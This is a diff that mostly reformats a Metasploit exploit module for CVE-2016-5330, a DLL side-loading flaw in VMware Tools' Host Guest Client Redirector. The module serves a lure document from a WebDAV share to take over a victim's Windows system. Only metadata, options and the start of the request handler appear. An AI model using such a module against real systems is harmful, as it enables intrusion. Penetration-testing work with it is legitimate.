Update vmhgfs_webdav_dll_sideload

modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb

@@ -1,4 +1,3 @@
-# Based on WebDAV Application DLL Hijacker module
 require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -9,8 +8,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'			=> 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',
+      'Name'           => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',
-      'Description'	=> %q{
+      'Description'    => %q{
       A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,
       a component of VMware Tools. This issue can be exploited by luring a victim into
       opening a document from the attacker's share. An attacker can exploit this issue to
@@ -18,9 +17,9 @@ class MetasploitModule < Msf::Exploit::Remote
       result in the attacker taking complete control of the affected system. If the WebDAV
       Mini-Redirector is enabled, it is possible to exploit this issue over the internet.
       },
-      'Author'		=> 'Yorick Koster',
+      'Author'         => 'Yorick Koster',
-      'License'		=> MSF_LICENSE,
+      'License'        => MSF_LICENSE,
-      'References' =>
+      'References'     =>
         [
           ['CVE', '2016-5330'],
           ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],
@@ -28,35 +27,33 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC' => 'thread'
-          'PAYLOAD' => 'windows/exec',
-          'CMD' => 'C:\\Windows\\System32\\calc.exe',
         },
-      'Payload'		=> { 'Space'	=> 2048, },
+      'Payload'        => { 'Space' => 2048, },
-      'Platform'		=> 'win',
+      'Platform'       => 'win',
-      'Targets' =>
+      'Targets'        =>
         [
-          [ 'Windows x64', {'Arch' => ARCH_X64,} ],
+          [ 'Windows x64', {'Arch' => ARCH_X86_64,} ],
-          [ 'Windows x86', {'Arch' => ARCH_X86,} ],
+          [ 'Windows x86', {'Arch' => ARCH_X86,} ]
         ],
-      'Privileged' => false,
+      'Privileged'     => false,
       'DisclosureDate' => 'Aug 5 2016',
-      'DefaultTarget' => 0))
+      'DefaultTarget'  => 0))
 
     register_options(
       [
-        OptPort.new('SRVPORT',		[ true, "The daemon port to listen on (do not change)", 80 ]),
+        OptPort.new('SRVPORT',     [ true, "The daemon port to listen on (do not change)", 80 ]),
-        OptString.new('URIPATH',	[ true, "The URI to use (do not change)", "/" ]),
+        OptString.new('URIPATH',   [ true, "The URI to use (do not change)", "/" ]),
-        OptString.new('BASENAME',	[ true, "The base name for the docx file", "Document1" ]),
+        OptString.new('BASENAME',  [ true, "The base name for the docx file", "Document1" ]),
-        OptString.new('SHARENAME',	[ true, "The name of the top-level share", "documents" ]),
+        OptString.new('SHARENAME', [ true, "The name of the top-level share", "documents" ])
       ], self.class)
 
-    deregister_options('SSL', 'SSLVersion', 'SSLCert') # no SSL
+    # no SSL
+    deregister_options('SSL', 'SSLVersion', 'SSLCert')
   end
 
 
   def on_request_uri(cli, request)
-
     case request.method
     when 'OPTIONS'
       process_options(cli, request)